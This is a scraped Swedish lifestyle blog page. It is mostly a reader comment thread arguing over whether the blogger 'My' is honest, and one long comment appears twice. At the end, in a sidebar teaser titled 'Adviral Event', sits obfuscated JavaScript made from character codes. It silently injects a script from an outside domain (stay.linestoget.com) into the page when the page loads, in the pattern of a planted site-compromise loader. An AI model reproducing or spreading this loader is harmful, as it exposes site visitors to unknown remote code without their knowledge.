   Jag förstår att flickan mått dåligt och hon HAR haft sin beskärda del av elände men jag tycker faktiskt hon ska sakta ner lite. Oavsett om hon nu blir mäklare eller inte så tror jag i alla fall att ett ”jobb” utanför bloggvärlden är att föredra. Blogga kan man göra ändå. Jag tror på kontinuitet i livet. Att man gör samma saker varje dag trots att det kan kännas som ett ekorrhjul. Men, det måste vara ett helvete att ha en blogg som är helt avhängigt av reklam och sponsorer. Jag tycker att det är strongt av My att dela med sig men för sin EGEN skull bör hon lämna det ”gamla” bakom sig. Jag har de i min närhet som gått i KBT och de har fått lära sig beta av det gamla och släppa in det nya OCH det har funkat.
   Att som My i inlägg efter inlägg dra hela den sorgliga historien om t ex My’s blommor osv river ju hela tiden upp gamla sår.
   My, jag hoppas du mår bra, jag hoppas verkligen också att det inte är sant att Jonas beklagat sig, och jag hoppas innerligt du förstår att OM han gjort det, så ÄR det DIG han skulle pratat med.
   Jag hoppas också du förstår att JAG vill dig inget illa trots att jag inte alltid tycker som du. Men jag har en hel del i min ryggsäck, på gott och ont, att dela med mig av.
   Lycka till
   Kram

  • Grejen är den att ifrågasätter man det hon ena dagen basunerar ut på bloggen så får man en lögn till svar. Eller inget svar. Därför reagerar man på hennes ÄRLIGA blogg då hon ljuger rakt ut. Bättte säga som det är.

   • Johanna, Varför är du överhuvudtaget taget här inne på Mys blogg om du bara ska ska skriva skit. Har du inget liv??????? Du sprider bara ondska. Skaffa dig en egen blogg.
    My sköt om dig och lev ditt liv.

    • En del av mitt ’jobb’.
     Bloggar och sänder vidare till andra bloggar jag samarbetar med så att My kanske till slut förstår innebörden och betydelsen av ärlighet. Hon är 30+ och borde veta bättre. Ju fler som påpekar o genomskådar ifrågasätter henne. Man kan bara hoppas att det en vacker dag går upp ett ljus att hon måste sluta ljuga och äntligen vara ärlig.

  • L2. Ett enkelt svar på din enkla fråga ang tjatet:
   Vi är många som inte får ihop att detta är en ’ärlig’ blogg då 80 % innehåller lögner. Punkt.

 42. Varför så elaka ord och varför sprida så mycket negativ energi? Varför?? Vad vill ni åstadkomma? Skrämmande hur ni beter er. Kram My

 43. Nu kommer min först bloggkommentar ngnsin ngnstans:)
  Oj, en del är verkligen arga här? Hur kan man bli arg över hur och vad ngn skriver i sin blogg om det inte är direkta elakheter mot andra?
  Att skriva en ärlig blogg behöver kanske inte betyda(min tolkning) att allt man skriver är helt korrekt(ibland kanske bloggaren behöver skarva för att skydda sig själv eller andra, vad vet jag?) och att man är skyldig att lämna ut precis allt. En ärlig blogg för mig är att den visar olika sidor av en människa, glädje, sorg, ytlighet, skörhet, smärta mm. Jag behöver inte veta allt i korrekta detaljer(hur ska jag kunna kolla facit liksom) utan jag vill mer ha en känsla av öppenhet.
  Att läsa en blogg är väl inget viktigt utan bara ett tidsfördriv(som nu när jag inte kan sova:)) varför läsa ngn blogg som man blir upprörd och arg över?
  Alla människor hanterar depression och utmattning på olika sätt. Även om man har lätt att se när ngn annan gör fel så behöver man inte påpeka det i en anklagande ton. Fast det är lättare att försöka rätta andra än att förändra sig själv. För mig också, jag är jättebra på att hitta lösningar åt andra och blunda åt mina egna fel/problem. Tror att My kommer andra strategi massor med ggr ju mer hon lär sig om sig själv. Jag kan tex tycka att hon gör fel på många sätt och därigenom tänka att så ska jag inte göra. Men det kanske inte är fel för henne?
  Sov gott alla och tänk på att
  Leva på jorden
  och vara snäll i orden

  • Till Kerstin! Stor kram till dig och din kommentar ❤️ Du visar hur en mogen och smart människa tänker. För bloggare äger sin blogg och vi läsare väljer vem vi vill läsa om. Upptäcker vi att bloggen inte känns ok av olika anledningar, då ska man sluta att läsa den och inte börja skriva kränkande. Jag har skrivit en kommentar för länge sedan om att bloggar är som skvallertidningar, för att alla och allt vinklas men är man smart som Kerstin så läser man mellan raderna och förstår. Det är här man då gör sitt val -Läsa eller inte läsa!!!! Till My, Kerstin och alla andra läsare så önskar jag er en fin helg med en jäkla massa kärlek!!!!!!!! ❤️❤️ Kram på er

 44. Nu kommer min först bloggkommentar ngnsin ngnstans:)

  Oj, en del är verkligen arga här? Hur kan man bli arg över hur och vad ngn skriver i sin blogg om det inte är direkta elakheter mot andra?

  Att skriva en ärlig blogg behöver kanske inte betyda(min tolkning) att allt man skriver är helt korrekt(ibland kanske bloggaren behöver skarva för att skydda sig själv eller andra, vad vet jag?) och att man är skyldig att lämna ut precis allt. En ärlig blogg för mig är att den visar olika sidor av en människa, glädje, sorg, ytlighet, skörhet, smärta mm. Jag behöver inte veta allt i korrekta detaljer(hur ska jag kunna kolla facit liksom) utan jag vill mer ha en känsla av öppenhet.

  Att läsa en blogg är väl inget viktigt utan bara ett tidsfördriv(som nu när jag inte kan sova:)) varför läsa ngn blogg som man blir upprörd och arg över?

  Alla människor hanterar depression och utmattning på olika sätt. Även om man har lätt att se när ngn annan gör fel så behöver man inte påpeka det i en anklagande ton. Fast det är lättare att försöka rätta andra än att förändra sig själv. För mig också, jag är jättebra på att hitta lösningar åt andra och blunda åt mina egna fel/problem. Tror att My kommer andra strategi massor med ggr ju mer hon lär sig om sig själv. Jag kan tex tycka att hon gör fel på många sätt och därigenom tänka att så ska jag inte göra. Men det kanske inte är fel för henne?

  Sov gott alla och tänk på att

  Leva på jorden
  och vara snäll i orden

  • Till Kerstin! Stor kram till dig och din kommentar ❤️ Du visar hur en mogen och smart människa tänker. För bloggare äger sin blogg och vi läsare väljer vem vi vill läsa om. Upptäcker vi att bloggen inte känns ok av olika anledningar, då ska man sluta att läsa den och inte börja skriva kränkande. Jag har skrivit en kommentar för länge sedan om att bloggar är som skvallertidningar, för att alla och allt vinklas men är man smart som Kerstin så läser man mellan raderna och förstår. Det är här man då gör sitt val -Läsa eller inte läsa!!!! Till My, Kerstin och alla andra läsare så önskar jag er en fin helg med en jäkla massa kärlek!!!!!!!! ❤️❤️ Kram på er

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/